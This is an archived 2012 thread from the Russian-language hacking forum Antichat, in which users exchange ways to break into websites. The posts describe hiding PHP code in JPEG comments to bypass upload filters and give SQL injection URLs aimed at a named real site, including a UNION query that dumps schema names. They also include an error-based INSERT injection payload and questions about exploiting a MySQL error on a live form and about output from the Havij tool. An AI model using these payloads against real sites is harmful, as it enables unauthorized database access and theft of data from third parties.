ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
16.02.2012, 06:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
13201
Репутация:
17
|
|
Сообщение от Киев
Киев said:
Вопрос такой: есть возможность заливать картинки на сайт, но расширение и содержимое файла фильтруется, так вот помню читал где-то что при редактировании изображения можно дописать php код в какие-то теги. Не напомните что за способ? Или поделитесь другими методами обхода такой фильтрации
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
|
|
|
|
16.02.2012, 06:58
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Сообщение от Юго
Юго said:
В фотографиях с расширением jpg есть комментарии. Так вот в качестве комментария можно дописать без вреда картинке(т.е. она потом будет открываться и работатькак картинка). Делается это с помощью программы edjpgcom.exe или другой для просмотра/редактирования комментариев в jpg файлах.
полюбому нужно чтоб сервер обрабатывал jpeg как php сценарии, чтоб код в exif исполнялся
|
|
|
16.02.2012, 11:26
|
|
Guest
Сообщений: n/a
Провел на форуме:
11980
Репутация:
1
|
|
http://www.artplast-100.ru/news/22/
http://www.artplast-100.ru/news/22-2/
как быть в таком случае?
http://www.artplast-100.ru/news/22 or 1=1/
http://www.artplast-100.ru/news/22/**/or/**/1=1/*/
и т д.
|
|
|
|
16.02.2012, 13:50
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от ReV0LVeR
ReV0LVeR said:
http://www.artplast-100.ru/news/22/
http://www.artplast-100.ru/news/22-2/
как быть в таком случае?
http://www.artplast-100.ru/news/22 or 1=1/
http://www.artplast-100.ru/news/22/**/or/**/1=1/*/
и т д.
http://www.artplast-100.ru/news/(-22)union(select(1),(select(group_concat(schema_nam e))from(information_schema.schemata)),3,4,5,6)/
но все данные могут не влезть
подробный ман
|
|
|
|
16.02.2012, 15:58
|
|
Guest
Сообщений: n/a
Провел на форуме:
13446
Репутация:
0
|
|
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!
|
|
|
|
16.02.2012, 16:22
|
|
Guest
Сообщений: n/a
Провел на форуме:
102354
Репутация:
267
|
|
Сообщение от Revi
Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!
Античат - форум экстрансенсов. Пробуй(думаю INSERT) =\
Код:
Code:
',(SELECT count(*) from information_schema.tables where table_name=1 or 1 group by concat(version(),rand(0)|0))),'
|
|
|
|
16.02.2012, 16:25
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от Revi
Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!
Это оч просто и всего лишь 2 варианта:
1. простой - короткий и понятный ман
2. сложный - использование программ для автоматической раскрутки скулей.
Сообщение от Ereee
Ereee said:
Античат - форум экстрансенсов. Пробуй(думаю INSERT) =\
Код:
Code:
',(SELECT count(*) from information_schema.tables where table_name=1 or 1 group by concat(version(),rand(0)|0))),'
Д ты хрен угадаешь что у него там )
|
|
|
|
16.02.2012, 18:14
|
|
Guest
Сообщений: n/a
Провел на форуме:
9412
Репутация:
0
|
|
Вопрос таков, кручу базу через хавий, показывает базу данных в таком ввиду, что это такое? Почему база так выглядит?
Data Base: J.I~?rl21m)" x~^xk[�rr?xWP}S(
Length of 'Data Base' is 17
Data Base: Z.F?`W!e?no]2f3kx
Length of 'Data Base' is 48
Data Base: Gf1?z@D??A&> ]{ijE&??;�xLx?oZ/V?5QzRkq3
|
|
|
|
16.02.2012, 18:38
|
|
Guest
Сообщений: n/a
Провел на форуме:
13446
Репутация:
0
|
|
мм
Сообщение от Revi
Revi said:
Добрый день
Вот есть пост запрос если я ввожу 'd'd'd'd'd' то она пишет ошибку мускуля
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'h'h'h'h'h'h'h'hh'h'', 'up', ''h'h'h'h'h'h'h'hh'h'', 'date at line 1
Вот так можно ли это раскрутить и как за ранее спс!
делал по манулу /thread43966.html
выбивает ошибку
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'UNION SELECT 1,2,3,4,5,6 --', 'ип', 'ваываыв', '2012-02-16 16:34:05',' at line 1
|
|
|
|
16.02.2012, 19:09
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
TYPUCT, потому что руками надо делать
кодировка
Revi, ты уверен что там 6?
да и не в этом суть.
экстрасенсы не знают что делать
может пруф уже скинешь, нет?
так вряд ли помогут
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
